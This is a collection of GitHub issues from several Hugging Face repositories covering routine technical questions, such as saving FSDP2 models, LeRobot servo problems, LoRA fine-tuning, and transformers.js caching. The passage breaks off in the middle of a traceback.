"huggingface/accelerate", "number": 3633, "title": "how to save a model with FSDP2 ?", "body": "Hello everyone, I\u2019m confused about how to save model weights using FSDP2. I keep running into OOM (out-of-memory) issues when trying to save a trained 8B model with FSDP2. Interestingly, memory is sufficient during training, but saving the model requires too much memory.\n\nI would like each rank to save only its own weights (Maybe the OOM issue doesn't occur in this case?)\n\nI\u2019m using 8 A100-40GB GPUs, and I\u2019d really appreciate your help.\n\nhere is my envs:\n```text\naccelereate==1.7.0\ntorch==2.6.0+cu12.6\ntransformers==4.52.4\n```\n\nthis is my accelerate config (FSDP2.ymal):\n```yaml\ncompute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: FSDP\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\nfsdp_config:\n fsdp_activation_checkpointing: false\n fsdp_auto_wrap_policy: TRANSFORMER_BASED_WRAP\n fsdp_cpu_ram_efficient_loading: true\n fsdp_offload_params: false\n fsdp_reshard_after_forward: true\n fsdp_state_dict_type: SHARDED_STATE_DICT\n fsdp_version: 2\nmachine_rank: 0\nmain_training_function: main\nmixed_precision: bf16\nnum_machines: 1\nnum_processes: 8\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```\n\nmy script (demo.py):\n```python\nimport os\nimport os.path as osp\n\nimport torch\nimport torch.nn as nn\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nfrom accelerate import Accelerator\n\nclass Mydataset(torch.utils.data.Dataset):\n def __init__(self, data_length=32, tokenizer = None):\n super().__init__()\n self.data_length = data_length\n self.tokenizer = tokenizer\n self.input_str = 'this is a test'\n self.data = tokenizer(self.input_str, return_tensors='pt', padding='max_length', max_length=32, padding_side='right')\n\n def __len__(self):\n return 10\n \n def __getitem__(self, idx):\n return {\n 'input_ids': self.data['input_ids'][0],\n 'attention_mask': self.data['attention_mask'][0]\n }\n\n\nif __name__ == '__main__':\n\n accelerator = Accelerator()\n model_path = \"./pretrain/Qwen3-8B\"\n\n model = AutoModelForCausalLM.from_pretrained(model_path, trust_remote_code=True)\n tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n\n dataset = Mydataset(tokenizer=tokenizer)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=16, shuffle=True)\n\n model, optimizer, dataloader = accelerator.prepare(model, optimizer, dataloader)\n\n loss_fuc = torch.nn.CrossEntropyLoss()\n\n model.train()\n # training\n for batch in dataloader:\n input_ids = batch['input_ids']\n attention_mask = batch['attention_mask']\n labels = batch['input_ids'].clone()\n\n outputs = model(input_ids=input_ids, attention_mask=attention_mask)\n\n labels = nn.functional.pad(labels, (0, 1), value=-100)\n shift_labels = labels[..., 1:].contiguous().view(-1)\n\n accelerator.wait_for_everyone()\n loss = loss_fuc(outputs.logits.view(-1, outputs.logits.shape[-1]), shift_labels)\n accelerator.backward(loss)\n\n optimizer.step()\n optimizer.zero_grad()\n\n print(\"training finished\")\n model.eval()\n model_save_path = \"./saved_models/tmp\"\n\n accelerator.save_model(model, model_save_path)\n print(\"Done\")\n```\n\ncommand:\n```bash\naccelerate launch --config_file ./accelerate_configs/FSDP2.yaml demo.py\n``` \n", "url": "https://github.com/huggingface/accelerate/issues/3633", "state": "closed", "labels": [], "created_at": "2025-06-18T11:41:05Z", "updated_at": "2025-06-18T15:36:37Z", "user": "colinzhaoxp" }, { "repo": "huggingface/datasets", "number": 7624, "title": "#Dataset Make \"image\" column appear first in dataset preview UI", "body": "Hi!\n\n#Dataset\n\nI\u2019m currently uploading a dataset that includes an `\"image\"` column (PNG files), along with some metadata columns. The dataset is loaded from a .jsonl file. My goal is to have the \"image\" column appear as the first column in the dataset card preview UI on the :hugs: Hub.\n\nHowever, at the moment, the `\"image\"` column is not the first\u2014in fact, it appears last, which is not ideal for the presentation I\u2019d like to achieve.\n\nI have a couple of questions:\n\nIs there a way to force the dataset card to display the `\"image\"` column first?\nIs there currently any way to control or influence the column order in the dataset preview UI?\nDoes the order of keys in the .jsonl file or the features argument affect the display order?\nThanks again for your time and help! :blush:", "url": "https://github.com/huggingface/datasets/issues/7624", "state": "closed", "labels": [], "created_at": "2025-06-18T09:25:19Z", "updated_at": "2025-06-20T07:46:43Z", "comments": 2, "user": "jcerveto" }, { "repo": "huggingface/agents-course", "number": 550, "title": "[QUESTION] Diagram of the multi-agent architecture", "body": "[Unit 2.1 Multi-Agent Systems](https://huggingface.co/learn/agents-course/unit2/smolagents/multi_agent_systems#multi-agent-systems) contains [an image](https://mermaid.ink/img/pako:eNp1kc1qhTAQRl9FUiQb8wIpdNO76eKubrmFks1oRg3VSYgjpYjv3lFL_2hnMWQOJwn5sqgmelRWleUSKLAtFs09jqhtoWuYUFfFAa6QA9QDTnpzamheuhxn8pt40-6l13UtS0ddhtQXj6dbR4XUGQg6zEYasTF393KjeSDGnDJKNxzj8I_7hLW5IOSmP9CH9hv_NL-d94d4DVNg84p1EnK4qlIj5hGClySWbadT-6OdsrL02MI8sFOOVkciw8zx8kaNspxnrJQE0fXKtjBMMs3JA-MpgOQwftIE9Bzj14w-cMznI_39E9Z3p0uFoA?type=png) depicting a diagram of the multi-agent architecture. In this image, the Manager Agent, which is typically responsible for task delegation, has direct access to a Code-Interpreter Tool. Would it be more reasonable in practice if there was a Code-Interpreter Agent between them?\n\n![Image](https://github.com/user-attachments/assets/02ce537b-c9b8-4a4d-9681-578688787c2d)", "url": "https://github.com/huggingface/agents-course/issues/550", "state": "open", "labels": [ "question" ], "created_at": "2025-06-18T08:58:58Z", "updated_at": "2025-06-18T08:58:58Z", "user": "st143575" }, { "repo": "huggingface/lerobot", "number": 1337, "title": "how to work with ur robot,and collect the data and fine turn the model ?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/1337", "state": "closed", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-06-17T09:51:16Z", "updated_at": "2025-10-17T11:49:17Z", "user": "mmlingyu" }, { "repo": "huggingface/diffusers", "number": 11730, "title": "Add `--lora_alpha` and metadata handling in training scripts follow up", "body": "With #11707, #11723 we pushed some small changes to the way we save and parse metadata for trained LoRAs, which also allow us to add a `--lora_alpha` arg to the Dreambooth LoRA training scripts, making LoRA alpha also configurable. \n\nThis issue is to ask for help from the community to bring these changes to the other training scripts.\nSince this is an easy contribution, let's try to leave this issue for beginners and people that want to start learning how to contribute to open source projects \ud83e\udd17\n\nUpdating list of scripts to contribute to: \n\n- [ ] [train_dreambooth_lora_sdxl_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sdxl_advanced.py)\n- [x] [train_dreambooth_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py)\n- [x] [train_dreambooth_lora_sd3](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sd3.py)\n- [x] [train_dreambooth_lora_sana](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sana.py)\n- [ ] [train_dreambooth_lora_lumina2](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n- [x] [train_dreambooth_lora_hidream](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_hidream.py)\n- [ ] [train_dreambooth_lora](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora.py)\n\nIf you want to contribute just answer to this issue with the one you want to do and tag me in the PR. Please only take one so we can use this opportunity for people to learn the ropes on how to contribute and get started with open source.\ncc: @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/11730", "state": "closed", "labels": [ "good first issue", "contributions-welcome" ], "created_at": "2025-06-17T09:29:24Z", "updated_at": "2025-06-24T10:58:54Z", "comments": 8, "user": "linoytsaban" }, { "repo": "huggingface/trl", "number": 3605, "title": "How to convert my multiturn dialogue dataset\uff1f", "body": "I have created a multiturn dialogue dataset. During the training process, the assistant's reply needs to be based on the user's reply and historical records in the previous round. First, the user's reply is labeled, and then the corresponding reply sentence is generated. In other words, the assistant's reply needs to rely on the previous multi-round dialogue data, and the reward function is based on the label prediction and reply sentence of the current round of reply. How should this kind of dataset be handled?\n####example\n{'role':'user',content:\"hello,doctor,I cant sleep well\"}\uff0c\n{'role':'assiatnt',content:\"userstate\uff1asleep problems \uff5c useremotion\uff1a\uff5cresponse\uff1aIs it trouble falling asleep or poor sleep quality?\"}\uff0c\n{'role':'user',content:\"All\"}\uff0c\n{'role':'assiatnt',content:\"userstate\uff1asleep problems \uff5c useremotion\uff1airritable\uff5cassistant-strategy\uff1aAsk for details\uff5cresponse\uff1aHow long has it lasted??\"}\uff0c\n{'role':'user',content:\"About two months\"}\uff0c\n......\n\nUsing a single round of user input alone cannot determine the user's state and emotions\u3002But I hope that in each round of user response, the output of the assistant will be evaluated.\n", "url": "https://github.com/huggingface/trl/issues/3605", "state": "closed", "labels": [ "\ud83c\udfcb Reward" ], "created_at": "2025-06-17T09:07:47Z", "updated_at": "2025-09-22T17:46:35Z", "user": "Miaoqinghong" }, { "repo": "huggingface/lerobot", "number": 1333, "title": "SO-100 Follower: Severe wrist_roll motor instability causing unwanted rotation during teleoperation", "body": "## Problem Description\n\nThe SO-100 Follower robot arm experiences severe instability in the `wrist_roll` motor during teleoperation, causing unwanted and uncontrollable rotation that significantly impacts usability. The motor exhibits extreme sensitivity and appears to be completely out of control in the default configuration.\n\n## Environment\n\n- **Robot**: SO-100 Follower\n- **LeRobot Version**: [Current version]\n- **Hardware**: Feetech STS3215 servos\n- **OS**: macOS\n- **Python**: 3.10.4\n\n## Quantitative Analysis\n\n### Baseline Analysis (Default Configuration)\n\n- **Data Collection**: 416.5 seconds, 24,894 data points\n- **Standard Deviation**: **95.596** (extremely high)\n- **Large Changes (>10.0)**: **242 occurrences**\n- **Value Distribution**:\n - Small values (|x|<5.0): **0%**\n - Large values (|x|\u226510.0): **100%** (completely uncontrolled)\n\n### Motor Correlation Analysis\n\nStrong correlations with other motors suggest cross-coupling issues:\n\n1. **elbow_flex.pos**: -0.253 (negative correlation, highest impact)\n2. **shoulder_lift.pos**: 0.203 (positive correlation)\n3. **gripper.pos**: 0.167 (positive correlation)\n4. **shoulder_pan.pos**: 0.124 (weak positive correlation)\n5. **wrist_flex.pos**: 0.026 (minimal correlation)\n\n### Trigger Pattern Analysis\n\nWhen wrist_roll experiences large changes (242 instances), average changes in other motors:\n\n- **elbow_flex.pos**: 1.970 (highest trigger)\n- **wrist_flex.pos**: 2.092\n- **shoulder_lift.pos**: 1.119\n- **gripper.pos**: 0.585\n- **shoulder_pan.pos**: 0.426\n\n## Root Cause Investigation\n\n### 1. Motor Configuration Issues\n\n- Default P_Coefficient (16) appears too high for wrist_roll motor\n- No deadzone filtering in default configuration\n- Potential hardware-level noise or mechanical coupling\n\n### 2. Cross-Motor Interference\n\n- Strong negative correlation with elbow_flex suggests mechanical or electrical interference\n- Movement of other motors triggers unwanted wrist_roll rotation\n\n### 3. Control System Sensitivity\n\n- Motor responds to minimal input changes\n- No built-in filtering for noise or small movements\n\n## Reproduction Steps\n\n1. Set up SO-100 Follower with default configuration\n2. Run teleoperation:\n ```bash\n python -m lerobot.teleoperate \\\n --robot.type=so100_follower \\\n --robot.port=/dev/tty.usbserial-130 \\\n --robot.id=blue \\\n --teleop.type=so100_leader \\\n --teleop.port=/dev/tty.usbserial-110 \\\n --teleop.id=blue\n ```\n3. Move any other motor (especially elbow_flex)\n4. Observe unwanted wrist_roll rotation\n\n## Attempted Solutions and Results\n\n### 1. P Coefficient Reduction\n\n**Implementation**: Reduced wrist_roll P_Coefficient from 16 to 4\n**Result**: Improved standard deviation from 95.596 to 59.976 (37.3% improvement)\n\n### 2. Deadzone Filtering\n\n**Implementation**: Added deadzone threshold (5.0) to ignore small changes\n**Result**: Partial improvement but problem persists\n\n### 3. Advanced Filtering System\n\n**Implementation**: Created comprehensive filtering with:\n\n- Moving average filter\n- Gripper-linked filter\n- Combined filtering modes\n **Result**: Reduced responsiveness but didn't eliminate core issue\n\n### 4. Complete Disabling (Workaround)\n\n**Implementation**: Force wrist_roll value to 0.0 at all times\n**Result**: Eliminates problem but removes wrist_roll functionality\n\n## Proposed Solutions\n\n### Short-term (Workarounds)\n\n1. **Lower P Coefficient**: Further reduce to 2 or 1\n2. **Stronger Deadzone**: Increase threshold to 20.0+\n3. **Motor Disabling**: Provide option to disable problematic motors\n\n### Long-term (Root Cause Fixes)\n\n1. **Hardware Investigation**: Check for:\n\n - Cable interference/noise\n - Mechanical coupling between joints\n - Motor calibration issues\n - Power supply stability\n\n2. **Software Improvements**:\n\n - Adaptive filtering based on motor correlations\n - Cross-motor interference compensation\n - Better default configurations for SO-100\n\n3. **Configuration Options**:\n - Motor-specific P/I/D coefficients\n - Built-in filtering options\n - Hardware-specific presets\n\n## Additional Data Available\n\nI have collected extensive analysis data including:\n\n- Multiple log files with quantitative measurements\n- Correlation analysis scripts and results\n- Visualization graphs showing the problem\n- Working implementations of various filtering approaches\n\n## Impact\n\nThis issue severely impacts the usability of SO-100 Follower robots for:\n\n- Teleoperation tasks\n- Data collection for machine learning\n- Precise manipulation requirements\n\nThe problem appears to be systemic rather than isolated to individual units, suggesting a configuration or design issue that affects the SO-100 platform generally.\n\n## Request for Assistance\n\nGiven the complexity of this issue and its impact on SO-100 usability, I would appreciate:\n\n1. Guidance on hardware-level debugging approaches\n2. Insights from other SO-100 users experiencing similar issues\n3. Potential firmware or configuration updates\n4. Recommendations for permanen", "url": "https://github.com/huggingface/lerobot/issues/1333", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-06-17T07:10:23Z", "updated_at": "2025-12-05T12:17:16Z", "user": "TKDRYU104" }, { "repo": "huggingface/safetensors", "number": 624, "title": "Interest in Parallel Model Training and Xformers Saving Support (Bug?) (SOLVED)", "body": "### Feature request\n\nI would like to request official support for xformers (link: https://github.com/facebookresearch/xformers) and parallel model training: https://huggingface.co/docs/transformers/v4.13.0/en/parallelism for the safetensor saving file format if this does not currently exist. This safetensors saving error may be a bug exclusive to my Diffusion-Transformer hybrid model architecture. \n\n### Motivation\n\nI had a problem when training a custom Diffusion-Transformer hybrid architecture with xformers and parallel model training. I tried to flatten the hybrid model for saving so the dimensions were what safetensors expected. However, the safetensors seem to require all the model training to reside in one place (and not parallel training). I believe that this may be a solvable error or bug? Thank you for your time. \n\n### Your contribution\n\nI am unsure how to suggest adding this feature into the safetensors project. ", "url": "https://github.com/huggingface/safetensors/issues/624", "state": "closed", "labels": [], "created_at": "2025-06-17T03:20:15Z", "updated_at": "2025-06-18T22:01:11Z", "comments": 1, "user": "viasky657" }, { "repo": "huggingface/lerobot", "number": 1330, "title": "Could you update the repository to enable the evaluation of SmolVLA's performance?", "body": "Could you update the repository to enable the evaluation of SmolVLA's performance?", "url": "https://github.com/huggingface/lerobot/issues/1330", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-17T02:38:22Z", "updated_at": "2025-10-17T11:50:22Z", "user": "Pandapan01" }, { "repo": "huggingface/transformers", "number": 38851, "title": "Should `compute_metrics` only run on the main process when doing DDP?", "body": "Hi, I want to know when doing training and evaluation on a multi-GPU setup (DDP using trainer and accelerate), does `compute_metrics` only need to be run on the main process?\n\nThe reason being that `trainer` itself already does `gather_for_metrics` ([here](https://github.com/huggingface/transformers/blob/v4.51-release/src/transformers/trainer.py#L4373)), which I suppose should collect all predictions (logits) and labels across processes, running `compute_metrics` from multiple processes again will be doing duplicated work, no?\n\nto add:\nI am using `batch_eval_metrics`, where I first spotted that if I run the training script (modified version of `run_clm.py`) with `accelerate launch`, the `compute_metrics` is always called multiple times, but the logits from `EvalPrediction` for each call is `per_device_eval_batch_size` * number of GPU I am using.", "url": "https://github.com/huggingface/transformers/issues/38851", "state": "closed", "labels": [], "created_at": "2025-06-17T00:09:43Z", "updated_at": "2025-07-25T08:02:33Z", "comments": 2, "user": "TIE666" }, { "repo": "huggingface/lerobot", "number": 1324, "title": "Where is control_robot.py script?", "body": "It is mentioned in the readme in the Walkthrough section that there is a script called control_robot.py. however, I can not see it in the main branch", "url": "https://github.com/huggingface/lerobot/issues/1324", "state": "closed", "labels": [], "created_at": "2025-06-16T15:57:34Z", "updated_at": "2025-06-18T11:06:11Z", "user": "AbdElRahmanFarhan" }, { "repo": "huggingface/agents-course", "number": 547, "title": "[QUESTION] Possible mistake in transformers size in terms of parameters", "body": "Hey,\n\nThanks for the great course!\n\nI have a question on what looks to me like an inconsistency.\nIn the [unit1/what-are-llms](https://huggingface.co/learn/agents-course/unit1/what-are-llms) section, when explaining the 3 types of transformers, in the Typical Size, we can see:\n\nDecoders:\nTypical Size: Billions (in the US sense, i.e., 10^9) of parameters\n\nSeq2Seq (Encoder\u2013Decoder)\nTypical Size: Millions of parameters\n\nIt looks strange to me that a Seq2Seq transformer, which comprises a Decoder within it, is smaller in Typical Size than a plain Decoders.\n\nI would put\n\nSeq2Seq (Encoder\u2013Decoder)\nTypical Size: Billions (in the US sense, i.e., 10^9) of parameters\n\nPlease tell me if there is something I misunderstood !\n\n\n", "url": "https://github.com/huggingface/agents-course/issues/547", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T14:43:29Z", "updated_at": "2025-06-16T14:43:29Z", "user": "jonoillar" }, { "repo": "huggingface/transformers.js", "number": 1341, "title": "FireFox compatible models", "body": "### Question\n\nI am fairly new to everything here and kind of just vibe code while I learn JS, but I use Zen browser and enjoy making it more like Arc over my summer. I was wondering if it was possible to expose the native Firefox AI and be able to prompt it, which I was able to do [here](https://github.com/Anoms12/Firefox-AI-Testing.uc.mjs). I discovered the models through some [documentation](https://github.com/mozilla-firefox/firefox/blob/901f6ff7b2ead5c88bd4d5e04aa5b30f2d2f1abb/toolkit/components/ml/docs/models.rst) Copilot brought me to in Firefox, and all of the models seem to be from you. However, the prompts I am trying to feed it seem to be too advanced for the current models I am using, Xenova/LaMini-Flan-T5-248M (I also tried out base, and models below it, but anything higher than 783M seemed to require access I did not have). I was wondering if you knew of/had a good model for this prompt. If not, I would love to be pointed in the right direction with any knowledge you do have.\n\n```\nAnalyze the following numbered list of tab data (Title, URL, Description) and assign a concise category (1-2 words, Title Case) for EACH tab.\n Some tabs might logically belong to groups already present based on common domains or topics identified by keywords.\n \n Tab Categorization Strategy:\n 1. For well-known platforms (GitHub, YouTube, Reddit, etc.), use the platform name as the category.\n 2. For content sites, news sites, or blogs, PRIORITIZE THE SEMANTIC MEANING OF THE TITLE over the domain.\n 3. Look for meaningful patterns and topics across titles to create logical content groups.\n 4. Use the domain name only when it's more relevant than the title content or when the title is generic.\n \n BE CONSISTENT: Use the EXACT SAME category name for tabs belonging to the same logical group.\n\n Input Tab Data:\n {TAB_DATA_LIST}\n\n ---\n Instructions for Output:\n 1. Output ONLY the category names.\n 2. Provide EXACTLY ONE category name per line.\n 3. The number of lines in your output MUST EXACTLY MATCH the number of tabs in the Input Tab Data list above.\n 4. DO NOT include numbering, explanations, apologies, markdown formatting, or any surrounding text like \"Output:\" or backticks.\n 5. Just the list of categories, separated by newlines.\n ---\n\n Output:\n```\n\nIf it was not clear, it is for a tab grouping script, the community currently has an Ollama, Gemini, and Mistral version, but we want to make it as easy as possible, so this seemed like the next logical step.\n\nThank you for anything you can provide in advance. I love the project.", "url": "https://github.com/huggingface/transformers.js/issues/1341", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T12:43:39Z", "updated_at": "2025-06-16T12:47:44Z", "user": "12th-devs" }, { "repo": "huggingface/lerobot", "number": 1319, "title": "How to debug or inspect the health of Feetech servos in so101 setup?", "body": "Hi, I'm working with the `so101` robot and running into issues with the Feetech servos.\n\nI would like to ask:\n\n1. Are there any recommended tools or procedures for debugging Feetech servos?\n2. How can I check the health of a servo (e.g. temperature, load, internal error)?\n\nAny help or pointers would be greatly appreciated. Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1319", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-16T08:58:32Z", "updated_at": "2025-08-12T10:01:41Z", "user": "DIMARIA123" }, { "repo": "huggingface/lerobot", "number": 1318, "title": "How to use my own dataset to train pi0 or smolVLA", "body": "I have a dataset that I collected and converted to Lerobot format. This dataset has not been uploaded to huggingface. I want to use this dataset to train `pi0` or `smolvla`. How should I set it up?\n\nI have tried to use only `dataset.root`, but it prompts that `dataset.repo_id` needs to be entered. What should I do?", "url": "https://github.com/huggingface/lerobot/issues/1318", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-16T08:40:50Z", "updated_at": "2025-10-17T11:51:54Z", "user": "xliu0105" }, { "repo": "huggingface/lerobot", "number": 1316, "title": "[Question] SmolVLA LIBERO / MetaWorld evaluation", "body": "Hello, thank you for open sourcing this wonderful repository. I have read the SmolVLA paper impressively and tried to run some evaluations.\n\n![Image](https://github.com/user-attachments/assets/fa20ea69-c60f-467f-ba4a-30c492a7faad)\n\nIn Section 4.5 of the paper, under Simulation Evaluation, it seems that you have fine-tuned the SmolVLA baseline to the Franka Emika Panda and the Swayer arm to perform evaluation on the LIBERO and MetaSim benchmark respectively.\nCould you elaborate on the details of the fine-tuning process? (which parameters were trained/frozen, optimizer, gradient steps, etc..)\nI am planning to reproduce the results. \n\nThank you.", "url": "https://github.com/huggingface/lerobot/issues/1316", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-06-16T06:28:50Z", "updated_at": "2025-12-10T22:11:17Z", "user": "tykim0507" }, { "repo": "huggingface/agents-course", "number": 546, "title": "[QUESTION] Can i solve this final assignment with free versions?", "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer, you can ask here, please **be specific**.\n\nI like to solve the final assignment, but I failed with free tools. I try to take inspiration from leaderboard toppers; they used paid tools, but I can't pay for that. Any free roadmap or idea?\n", "url": "https://github.com/huggingface/agents-course/issues/546", "state": "open", "labels": [ "question" ], "created_at": "2025-06-16T06:13:37Z", "updated_at": "2025-06-16T06:13:37Z", "user": "mehdinathani" }, { "repo": "huggingface/datasets", "number": 7617, "title": "Unwanted column padding in nested lists of dicts", "body": "```python\nfrom datasets import Dataset\n\ndataset = Dataset.from_dict({\n \"messages\": [\n [\n {\"a\": \"...\",},\n {\"b\": \"...\",},\n ],\n ]\n})\nprint(dataset[0])\n```\n\nWhat I get:\n```\n{'messages': [{'a': '...', 'b': None}, {'a': None, 'b': '...'}]}\n```\n\nWhat I want:\n\n```\n{'messages': [{'a': '...'}, {'b': '...'}]}\n```\n\nIs there an easy way to automatically remove these auto-filled null/none values?\n\nIf not, I probably need a recursive none exclusion function, don't I?\n\nDatasets 3.6.0", "url": "https://github.com/huggingface/datasets/issues/7617", "state": "closed", "labels": [], "created_at": "2025-06-15T22:06:17Z", "updated_at": "2025-06-16T13:43:31Z", "comments": 1, "user": "qgallouedec" }, { "repo": "huggingface/transformers.js", "number": 1340, "title": "Audio-to-Audio task", "body": "### Question\n\nHi there.\n\nI would like to know how running **Audio-to-Audio models** with _transformers.js_.\n\nI haven't success to found any material about this. If has no way, is there some schedule to adds this?\n\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/1340", "state": "open", "labels": [ "question" ], "created_at": "2025-06-15T17:58:54Z", "updated_at": "2025-10-13T04:45:39Z", "user": "LuSrodri" }, { "repo": "huggingface/open-r1", "number": 677, "title": "Error from E2B executor: cannot access local variable 'sandbox' where it is not associated with a value", "body": "Hi there,\n\nI encountered a bug while following the sandbox setup instructions exactly as provided. Here\u2019s what I\u2019m seeing:\n\n![Image](https://github.com/user-attachments/assets/b0bebd84-00cb-469d-a73e-dbf9f91555f3)\n\nHas anyone experienced this before? Any advice on how to resolve it would be greatly appreciated!\n\nThank you. : )", "url": "https://github.com/huggingface/open-r1/issues/677", "state": "closed", "labels": [], "created_at": "2025-06-14T19:08:22Z", "updated_at": "2025-07-22T06:55:38Z", "user": "juyongjiang" }, { "repo": "huggingface/agents-course", "number": 536, "title": "[QUESTION] Llama-3.3-70B-Instruct model request denied", "body": " My request was denied for access to Llama-3.3-70B-Instruct model. However, it was accepted for the Llama 4 models. Is it possible that meta is limiting access after the release of Llama 4 in April?\n\nCould the course be updated to reflect this change?", "url": "https://github.com/huggingface/agents-course/issues/536", "state": "open", "labels": [ "question" ], "created_at": "2025-06-12T00:29:48Z", "updated_at": "2025-06-12T00:29:48Z", "user": "BookDisorder" }, { "repo": "huggingface/transformers.js", "number": 1339, "title": "Model is cached, but still reloads from network?", "body": "### Question\n\nI have this code in a React project : \n```\nimport { env, pipeline } from \"@xenova/transformers\";\nconst model = await pipeline(\"translation\", \"Xenova/opus-mt-de-en\");\nlet transText = await model(\"hallo, ich bin hier\");\n```\n\nWhen I inspect the browser cache, I see relevant files in \"cache storage\". (xenova-opus-mt-de-en...)\nBut when I reload the network says I am re-downloading it each time from cdn.jsdeliver.net \n\nHow can I get it to grab the cached version instead of do a network request?", "url": "https://github.com/huggingface/transformers.js/issues/1339", "state": "closed", "labels": [ "question" ], "created_at": "2025-06-11T16:19:26Z", "updated_at": "2025-06-27T06:06:25Z", "user": "patrickinminneapolis" }, { "repo": "huggingface/peft", "number": 2583, "title": "Lora transfer learning", "body": "Hello, I am training a lora model using flux fill pipeline using diffusers+peft+accelerate. I already have a lora model for general purpose for my application which was trained for 5k steps and large dataset. Now, I want to do transfer learning to finetune on very small dataset but want to train from previous lora model instead of scratch training. how can I do it? My lora config is as following. Currently I am using `gaussian` method to initialize lora model. Is there anyway to use pretrained lora model without random initialize? Thanks in advance. \n\n```\n lora_config:\n r: 256\n lora_alpha: 256\n init_lora_weights: \"gaussian\"\n target_modules: \"(.*x_embedder|.*(? Float32Array(5120000)\u00a0[...]\n```\n\nSince the model itself has only 16-bit precision, returning a Float32Array (instead of [Float16Array](https://caniuse.com/mdn-javascript_builtins_float16array) that is supported in latest browsers) seems a waste of performance. Is this comment correct, and do we have plans to support Float16Array for better performance? Thanks!", "url": "https://github.com/huggingface/transformers.js/issues/1338", "state": "open", "labels": [ "question" ], "created_at": "2025-06-11T07:29:19Z", "updated_at": "2025-07-03T05:50:56Z", "user": "xmcp" }, { "repo": "huggingface/transformers", "number": 38745, "title": "[Bug][InformerForPredict] The shape will cause a problem", "body": "### System Info\n\nWhen I set the infomerconfig.input_size = 1, I find a bug, but I don't know how to fix it.\n\n- Function Name : `create_network_inputs`\n```\ntime_feat = (\n torch.cat(\n (\n past_time_features[:, self._past_length - self.config.context_length :, ...],\n future_time_features,\n ),\n dim=1,\n )\n if future_values is not None\n else past_time_features[:, self._past_length - self.config.context_length :, ...]\n )\n\n print(self._past_length)\n # target\n if past_observed_mask is None:\n past_observed_mask = torch.ones_like(past_values)\n\n context = past_values[:, -self.config.context_length :]\n observed_context = past_observed_mask[:, -self.config.context_length :]\n _, loc, scale = self.scaler(context, observed_context)\n\n inputs = (\n (torch.cat((past_values, future_values), dim=1) - loc) / scale\n if future_values is not None\n else (past_values - loc) / scale\n )\n print(loc.shape, scale.shape, inputs.shape)\n\n # static features\n log_abs_loc = loc.abs().log1p() if self.config.input_size == 1 else loc.squeeze(1).abs().log1p()\n log_scale = scale.log() if self.config.input_size == 1 else scale.squeeze(1).log()\n print(f\"log_abs_loc: {log_abs_loc.shape}, {log_scale.shape}\")\n print(time_feat.shape, self.config.input_size)\n static_feat = torch.cat((log_abs_loc, log_scale), dim=1)\n print(time_feat.shape, static_feat.shape)\n if static_real_features is not None:\n static_feat = torch.cat((static_real_features, static_feat), dim=1)\n if static_categorical_features is not None:\n embedded_cat = self.embedder(static_categorical_features)\n static_feat = torch.cat((embedded_cat, static_feat), dim=1)\n print(time_feat.shape, static_feat.shape)\n expanded_static_feat = static_feat.unsqueeze(1).expand(-1, time_feat.shape[1], -1)\n\n # all features\n features = torch.cat((expanded_static_feat, time_feat), dim=-1)\n\n # lagged features\n subsequences_length = (\n self.config.context_length + self.config.prediction_length\n if future_values is not None\n else self.config.context_length\n )\n lagged_sequence = self.get_lagged_subsequences(sequence=inputs, subsequences_length=subsequences_length)\n lags_shape = lagged_sequence.shape\n reshaped_lagged_sequence = lagged_sequence.reshape(lags_shape[0], lags_shape[1], -1)\n\n if reshaped_lagged_sequence.shape[1] != time_feat.shape[1]:\n raise ValueError(\n f\"input length {reshaped_lagged_sequence.shape[1]} and time feature lengths {time_feat.shape[1]} does not match\"\n )\n\n # transformer inputs\n transformer_inputs = torch.cat((reshaped_lagged_sequence, features), dim=-1)\n\n return transformer_inputs, loc, scale, static_feat\n```\n\nAs we can see, I add some `print` sentence in the library to see the shape, now the bug is:\n```\nTraceback (most recent call last):\n File \"/home/wjt/luck/FinalWork/alert_models/informer_based_model_3_cpu.py\", line 820, in \n pipline.train_model()\n File \"/home/wjt/luck/FinalWork/alert_models/informer_based_model_3_cpu.py\", line 466, in train_model\n outputs = model(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1844, in forward\n outputs = self.model(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, 